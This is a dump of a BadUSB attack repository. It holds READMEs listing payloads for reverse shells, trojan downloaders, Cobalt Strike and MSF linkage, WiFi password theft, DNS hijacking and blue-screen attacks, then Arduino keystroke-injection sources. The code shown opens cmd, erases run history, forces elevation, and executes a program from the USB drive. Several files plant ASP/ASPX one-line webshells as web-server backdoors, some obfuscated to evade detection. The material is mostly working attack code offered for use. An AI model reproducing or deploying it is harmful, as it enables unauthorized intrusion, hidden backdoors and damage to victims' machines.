│ 延迟蓝屏(DOS).ino
│ 注册表写入致使开机蓝屏通用(DOS).ino
│ 注册表写入致使开机蓝屏(DOS).ino
│
├─CobaltStrike木马联动
│ │ BitsAdmin木马执行(与CS联动).ino
│ │ Pl木马执行(与CS联动).ino
│ │ PSL木马执行(与CS联动).ino
│ │ PY木马执行(与CS联动).ino
│ │ Regsvr32木马执行(与CS联动).ino
│ │
│ ├─CobaltStrike各种语言的Payload
│ │ payload.bin
│ │ payload.c
│ │ payload.cs
│ │ payload.java
│ │ payload.pl
│ │ payload.ps1
│ │ payload.py
│ │ payload.rb
│ │ payload.sct
│ │ payload.txt
│ │ payload.vba
│ │
│ └─CounterStrike木马制作教程
│ CounterStrike.jpg
│ CounterStrike木马制作教程.png
│
├─DNS劫持
│ DOS命令设置多个DNS(DNS劫持).ino
│ PSL命令设置多个DNS(DNS劫持).ino
│
├─Linux内置反向Shell
│ Linux内置的反向Shell(BashShell).ino
│ Linux反向Shell(PerlShell).ino
│ Linux反向Shell(代码执行).ino
│
├─MSF木马联动
│ shell.apk
│ shell.asp
│ shell.aspx
│ shell.elf
│ shell.exe
│ shell.jar
│ shell.jsp
│ shell.macho
│ shell.php
│ shell.pl
│ shell.psl
│ shell.py
│ shell.sh
│ shell.war
│ Shell木马生成配置.txt
│
├─OSX内置反向Shell
│ osx系统反向连接(dns_shell).ino
│ osx系统反向连接(perl_shell).ino
│ osx系统反向连接(ruby_shell).ino
│
├─PSL全屏HACKED画面
│ ├─FullScreenHackedv0
│ │ │ get.ps1
│ │ │
│ │ └─FullScreenHackedv
│ │ FullScreenHackedv.ino
│ │
│ ├─FullScreenHackedv2
│ │ FullScreenHackedv2.ino
│ │ wall.ps1
│ │
│ └─FullScreenHackedv3[慎用]
│ │ get.ps1
│ │
│ └─FullScreenHackedv3
│ FullScreenHackedv3.ino
│
├─Ubuntu信息搜集
│ Ubuntu信息搜集到TXT文件(信息).ino
│ Ubuntu的基本终端命令(显示).ino
│
├─WIFI密码获取
│ WIFI密码导出(工具).ino
│ Wifi密码捕获(工具).ino
│
├─WIFI连接木马
│ 强迫连接指定WIFI并下载psl木马运行(木马入侵).ino
│
├─代码原理解读
│ arduino按键代码基础.ino
│ MSF木马制作教程.txt
│ 关于setup和loop方法的说明.txt
│
├─木马下载器
│ ├─CERTUTIL木马下载器(木马攻击)代码
│ │ 链接服务器msf木马certutil下载版.ino
│ │
│ ├─FTP木马下载器(木马攻击)代码
│ │ FTP下载netcat并反向连接shell(木马攻击).ino
│ │
│ ├─JAVA木马写入(木马攻击)代码
│ │ java木马写入(目标环境可运行Java).ino
│ │ server.java
│ │
│ ├─PSL木马下载器(木马攻击)代码
│ │ powershell下载服务器木马.ino
│ │ psl木马下载器1(木马攻击).ino
│ │ psl木马下载器2(木马攻击).ino
│ │ psl木马下载器3通用(木马攻击).ino
│ │ psl木马下载器4通用(木马攻击).ino
│ │ psl木马下载器win&linux通用(木马攻击).ino
│ │ psl木马写入并反弹(木马攻击).ino
│ │ 下载psl木马并二次执行(木马攻击).ino
│ │ 链接服务器msf木马psl下载版.ino
│ │ 链接服务器psl下载版.ino
│ │
│ └─PY木马下载器(木马攻击)代码
│ PyShellServer.py
│ Py木马写入(目标环境可运行Python).ino
│
├─添加用户并开启服务
│ 添加用户并开启3389(工具).ino
│ 添加用户并开启ftp(工具).ino
│
├─特定功能代码
│ Alt_F4循环关闭窗口后关机(工具).ino
│ Shift后门(工具).ino
│ 单纯改变所有用户密码(恶作剧项).ino
│ 启动PSL远程连接功能(工具).ino
│ 强制删除360各项进程(工具).ino
│ 强制执行关机ShutDown命令(工具).ino
│ 截屏并发送指定FTP地址(工具).ino
│ 打开对方445端口(内网渗透).ino
│ 打开指定网页(工具).ino
│ 更改所用账户密码+关闭系统进程+蓝屏(工具).ino
│ 添加用户代码(工具).ino
│ 简简单单关个机(恶作剧项).ino
│ 隐藏CMD窗口(显示).ino
│ 鼠标不停移动(工具).ino
│
├─网站一句话入侵代码
│ aspx一句话木马写入(网站服务器版本-过狗过D盾).ino
│ aspx一句话木马写入(网站服务器版本) .ino
│ asp一句话木马写入(网站服务器版本-Script Encoder 加密).ino
│ asp一句话木马写入(网站服务器版本-动态解码).ino
│ asp一句话木马写入(网站服务器版本) .ino
│ jsp一句话木马写入(jsp网站服务器使用).ino
│ jsp木马写入(jsp网站服务器使用非一句话).ino
│ php木马写入(php网站服务器使用-异或绕过).ino
│ php木马写入(php网站服务器使用-类绕过).ino
│ php木马写入(php网站服务器使用).ino
│
└─运行U盘内的程序_扩大入侵范围
├─UdiskRun
│ UdiskRun.ino
│
├─UdiskRunv2
│ UdiskRunv2.ino
│
└─UdiskRunv3
UdiskRunv3.ino
### 演示<br>
[更改所用账户密码+关闭系统进程+蓝屏测试](https://www.yuque.com/u12074055/gzgwfh/dg804t)<br>
<br>
### 进阶<br>
网站一句话入侵<br>
BadUSB&MSF联动<br>
BadUSB&CS联动<br>
WIFI局域网入侵<br>
运行U盘内的程序_扩大入侵范围<br>
<br>
### 解疑<br>
你可以在微信、QQ群、Gitee、Gihub上留言,团队看到后会尽快回复。
<br>
### 扩展<br>
实现特定功能<br>
其他实现BadUSB功能的板子(需要另安驱动,不是特别推荐)<br>
<br>
### 更新<br>
###### 2021.02.06更新代码,部分是从其他爱好者哪里搜寻的开源代码,部分是与MSF联动的方法流程以及我认为比较好用的Arduino Leonardo基础按键代码<br>
###### 2021.02.14更新代码,从其他优秀项目中获得启发,加入了CobaltStrike联动的木马、DNS劫持代码、linux和osx内置反向shell、WIFI连接木马、WIFI密码获取、网站一句话入侵代码、psl全屏hacked画面、运行U盘内的程序_扩大入侵范围以及实现很多实用功能的代码,情人节快乐!<br>
<br>
### 项目链接<br>
代码已上传至GitHub及Gitee,**跪求star**,其他项目也挺好玩的, **继续跪求Star**。<br>
**GitHub:** https://github.com/wangwei39120157028/BadUSB<br>
**Gitee:** https://gitee.com/wwy2018/BadUSB<br>
================================================
FILE: README.md
================================================
# BadUSB
<br>
This project takes advantage of the loophole in USB protocol. By changing the internal firmware of USB, after accessing the USB interface, it simulates the functions of external mouse and keyboard, so as to make the target host execute the well-constructed commands.<br>
<br>
#### QQ:775942445<br>
#### WeChat:wwy18795980897<br>
### Introduction<br>
Like most of us, BadUSB was first introduced in Mr. Robot and is one of the FSociety's most popular tools. Whether it's downloading a Trojan to a server to control a victim's host, or Darlene throwing a bunch of USB phishing devices in a parking lot, BadUSB is one of the most important physical weapons. <br>
<br>
### Advantage<br>
Is commonly used in the field of USB attack, many years ago old USB virus (automatic) autorun. Inf, but the file is now will be antivirus software easily detected, and the autorun. J inf, BadUSB is to use a loophole in the USB protocol, by changing the interior of the USB firmware, after normal USB port access, to simulate the external function of the mouse, keyboard, in order to make the target host execution has been carefully constructed good command. In this process will not cause anti-virus software, a trace of suspicion firewall. And because it's at the firmware level, USB flash drive formatting can't prevent the execution of its internal code. <br>
<br>
My latest favorite is leonardo_Arduino board, because the same is the use of USB, Windows, Linux, Mac and other operating systems default existence leonardo_Arduino USB interface driver, do not have to network download dedicated driver. In addition, to BADUSB burning procedures are very simple, most of the keyboard, mouse keys for simulation, easy to get started. <br>
BadUSB is also a good example of social engineering. It plays on people's curiosity. It's estimated that more than 90% of people will want to see what's inside a USB they pick up on the side of the road. <br><br>
<br>
### Tutorial <br>
[Video address](https://www.yuque.com/u12074055/cpuceb/qicml3) <br>
Video: Introduction to BsdUSB Compiler<br>
Video: BadUSB driver installation and code writing<br>
Video: BadUSB basic operation<br>
[For detailed steps, please go to the brief book](https://www.jianshu.com/p/2b2b1dab85fe) <br>
<br>
### Directory<br>
BadUSB
│ LICENSE
│ README.en.md
│ README.md
│
├─AddUser_StartService
│ AddUser_Enable3389(tools).ino
│ AddUser_EnableFTP(tools).ino
│
├─BlueScreen
│ BlueScreen1(DOS).ino
│ BlueScreen2(DOS).ino
│ BlueScreen3(DOS).ino
│ BlueScreen_xp_win7(DOS).ino
│ DelayedBlueScreen (DOS).ino
│ RegistryWriteBlueScreen (DOS).ino
│ RegistryWriteBlueScreenGeneralUse (DOS).ino
│
├─CobaltStrike_Trojanlinkage
│ │ Bitsadmin_TrojanExecution (LinkageWithCS).ino
│ │ Pl_TrojanExecution (LinkageWithCS).ino
│ │ PSL_TrojanExecution (LinkageWithCS).ino
│ │ PY_TrojanExecution (LinkageWithCS).ino
│ │ Regsvr32_TrojanExecution (LinkageWithCS).ino
│ │
│ ├─CobaltStrike_Payload
│ │ payload.bin
│ │ payload.c
│ │ payload.cs
│ │ payload.java
│ │ payload.pl
│ │ payload.ps1
│ │ payload.py
│ │ payload.rb
│ │ payload.sct
│ │ payload.txt
│ │ payload.vba
│ │
│ └─CounterStrikeTrojanTutorial
│ CounterStrike.jpg
│ CounterStrikeTutorial.png
│
├─CodePrincipleInterpretation
│ ArduinoKeyCodeBase.ino
│ InstructionsOn_setup_loop_Methods.txt
│ MSF_TrojanMakingTutorial.txt
│
├─DNSHijack
│ DOS_CommandSetMultipleDNS(DNSHijack).ino
│ PSL_CommandSetMultipleDNS(DNSHijack).ino
│
├─Linux_Built-inReverseShell
│ LinuxReverseShell (CodeExecution).ino
│ LinuxReverseShell(BashShell).ino
│ LinuxReverseShell(PerlShell).ino
│
├─MSF_Trojanlinkage
│ shell.apk
│ shell.asp
│ shell.aspx
│ shell.elf
│ shell.exe
│ shell.jar
│ shell.jsp
│ shell.macho
│ shell.php
│ shell.pl
│ shell.psl
│ shell.py
│ shell.sh
│ shell.war
│ Shell_TrojanGenerationConfiguration.txt
│
├─OSX_Built-inReverseShell
│ OSX_SystemReverseConnection (dns_shell).ino
│ OSX_SystemReverseConnection (perl_shell).ino
│ OSX_SystemReverseConnection (ruby_shell).ino
│
├─PSL_FullScreen-HACKED
│ ├─FullScreenHackedv0
│ │ │ get.ps1
│ │ │
│ │ └─FullScreenHackedv
│ │ FullScreenHackedv.ino
│ │
│ ├─FullScreenHackedv2
│ │ FullScreenHackedv2.ino
│ │ wall.ps1
│ │
│ └─FullScreenHackedv3
│ │ get.ps1
│ │
│ └─FullScreenHackedv3
│ FullScreenHackedv3.ino
│
├─RunProgramOn_UDrive_ExpandScopeOfIntrusion
│ ├─UdiskRun
│ │ UdiskRun.ino
│ │
│ ├─UdiskRunv2
│ │ UdiskRunv2.ino
│ │
│ └─UdiskRunv3
│ UdiskRunv3.ino
│
├─Site_AWord_IntrusionCode
│ AspSentenceTrojanWrite(webServerVersion).ino
│ AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
│ AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
│ AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
│ AspxSentenceTrojanWrite(webServerVersion).ino
│ JspSentenceTrojanWritten (JSP_websiteServerUse).ino
│ JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
│ PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
│ PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
│ PHP_TrojanWrite(usedByPHP_websiteServer).ino
│
├─SpecificFunctionCode
│ AddUserCode(Tools).ino
│ Alt-f4_Loop.ino
│ ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
│ EnablePSL_RemoteConnection(Tools).ino
│ ForcedDeletionOf360Processes(Tools).ino
│ ForceShutDownCommand(Tool).ino
│ Hide_CMD_Window(Display).ino
│ MouseKeepsMoving(Tools).ino
│ OpenPort445.ino
│ OpenSpecified_webPage.ino
│ ShiftBackdoor.ino
│ SimplyChangeAllUsersPasswords(TrickItem).ino
│ SimplyShutDownMachine(TrickItem).ino
│ TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
│
├─TrojanDownloader
│ ├─CERTUTIL_DownLoader
│ │ CERTUTIL_DownLoader_MSF.ino
│ │
│ ├─FTP_DownLoader
│ │ FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
│ │
│ ├─JAVA_DownLoader
│ │ JavaTrojanWrite(TargetEnvironmentRunJava).ino
│ │ server.java
│ │
│ ├─PSL_DownLoader
│ │ Downloa_PSL_Trojan-Execute_aSecondTime.ino
│ │ LinkServer_MSF_PSL_Download.ino
│ │ LinkServer_PSL_Download.ino
│ │ PSL_DownLoader0.ino
│ │ PSL_DownLoader1.ino
│ │ PSL_DownLoader2.ino
│ │ PSL_DownLoader3.ino
│ │ PSL_DownLoader4.ino
│ │ PSL_Downloader_Win&Linux_General.ino
│ │ PSL_Writes_Bounces.ino
│ │
│ └─PY_DownLoader
│ PyShellServer.py
│ Py_TrojanWrite(TargetEnvironmentRunPython).ino
│
├─Ubuntu_InformationGathering
│ BasicTerminalCommandsForUbuntu(Display).ino
│ UbuntuInformationCollectionTXT_File(Information).ino
│
├─WiFi_ConnectionTrojan
│ ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
│
└─WiFi_PasswordAcquisition
WiFiPasswordCapture(tool).ino
WiFiPasswordExport(tool).ino
### Demo<br>
[Video address](https://www.yuque.com/u12074055/gzgwfh/dg804t) <br>
Video: [Hardware Hacker] Control the upload through WiFi to execute, run, write HID scripts for BADUSB as well as a small extra 1<br>
Video: [Hardware Hacker] Control the upload via WiFi to execute, run, and write HID scripts for BADUSB as well as a small extra 2<br>
Video: [BADUSB Demo] U Drive Attack: Ignore any kill soft, hack your computer in 3 seconds!<br>
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 1<br>
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 2<br>
Video: [BADUSB demo] BADUSB implementation record keyboard<br>
Video: [BADUSB demo] Change the password of the account used + close the system process + blue screen test<br>
<br>
### Advanced<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/dm1veu) <br>
Video: Badusb&MSF linkage<br>
Video: Start BadUSB with Nethunter<br>
<br>
### Frequently asked questions and errors<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/uofha2) <br>
Video: BadUSB code writes exception handling<br>
<br>
### extension<br>
[Video address](https://www.yuque.com/u12074055/cpuceb/hs3n7p) <br>
Video: [Hardware Hacker] Nine dollars to make a BadUSB<br>
Video: [Hardware Hacker] can directly replace Big Yellow Duck and Wifiducky's new BadUSB<br>
Video: BadUSB Tutorial Digispark + Chinese BadUSB<br>
<br>
### Update<br>
###### 2021.02.06 update code, part of which is the open source code searched from other enthusiasts, part of which is the method flow linked with MSF and the Arduino Leonardo basic key code that I think is better to use<br>
###### 2021.02.14 update code, gain inspiration from other good project, join the trojans, DNS hijacking CobaltStrike linkage code, Linux and osx reverse shell, WIFI connection trojans, built-in WIFI password access, website a word invasion code, PSL full-screen hacked images, running programs in the U dish _ for expanding the scope of the invasion, and realize a lot of practical function code, the valentine day is joyful!<br>
<br>
### Link<br>
The code has been uploaded to GitHub and Gitee, **beg star**, other projects are also very fun, **continue to beg star**.<br>
**GitHub:** https://github.com/wangwei39120157028/BadUSB<br>
**Gitee:** https://gitee.com/wwy2018/BadUSB<br>
================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
delay(500);
Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
delay(100);
Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
delay(1000);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("powershell -c start-process -Filepath cmd \' /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\'-verb runas");
delay(3000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
delay(1000);
Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
delay(500);
Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /K REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F");
delay(500);
Keyboard.println("POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS&TASKKILL /F /IM CMD.EXE");
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
for(int i=0;i<100;i++){
delay(10);
Keyboard.print('y');
}
Keyboard.release(KEY_LEFT_ALT);
delay(1000);
Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)");
delay(300);
Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /c REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS");
delay(1500);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
delay(1000);
Keyboard.println();
delay(300);
Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)"); //lemonc可替换
delay(300);
Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println('echo ^<%eval request("wwy")%^> >> hacked.asp'); //向hacked.asp写内容,密码wwy
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<% >> hacked.asp"); //向hacked.asp写内容,密码z
delay(200);
Keyboard.println("echo Function MorfiCoder(Code) >> hacked.asp");
delay(200);
Keyboard.println("echo MorfiCoder=Replace(Replace(StrReverse(Code),'/*/',''''),'\*\',vbCrlf) >> hacked.asp");
delay(200);
Keyboard.println("echo End Function >> hacked.asp");
delay(200);
Keyboard.println('echo Execute MorfiCoder(")/*/z/*/(tseuqer lave") >> hacked.asp');
delay(200);
Keyboard.println("echo %^> >> hacked.asp");
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<%@ LANGUAGE = VBScript.Encode %^> >> hacked.asp"); //向hacked.asp写内容,密码wwy
delay(200);
Keyboard.println('echo ^<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%^> >> hacked.asp'); //向hacked.asp写内容,密码c
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<%@ Page Language = Jscript %^> >> hacked.aspx"); //向hacked.aspx写内容,密码-7
delay(200);
Keyboard.println("echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/'e'+'v'+/*-/*-*/ >> hacked.aspx");
delay(200);
Keyboard.println("echo 'a'+'l'+'('+'R'+'e'+/*-/*-*/'q'+'u'+'e'/*-/*-*/+'s'+'t'+ >> hacked.aspx");
delay(200);
Keyboard.println("echo '[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]'+ >> hacked.aspx");
delay(200);
Keyboard.println("echo ','+'\''+'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'+'\''+')';eval >> hacked.aspx");
delay(200);
Keyboard.println("echo (/*-/*-*/P/*-/*-*/,/*-/*-*/'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'/*-/*-*/);%^> >> hacked.aspx");
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println('echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["wwy"],"unsafe");%^> >> hacked.asp'); //向hacked.asp写内容,密码wwy
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
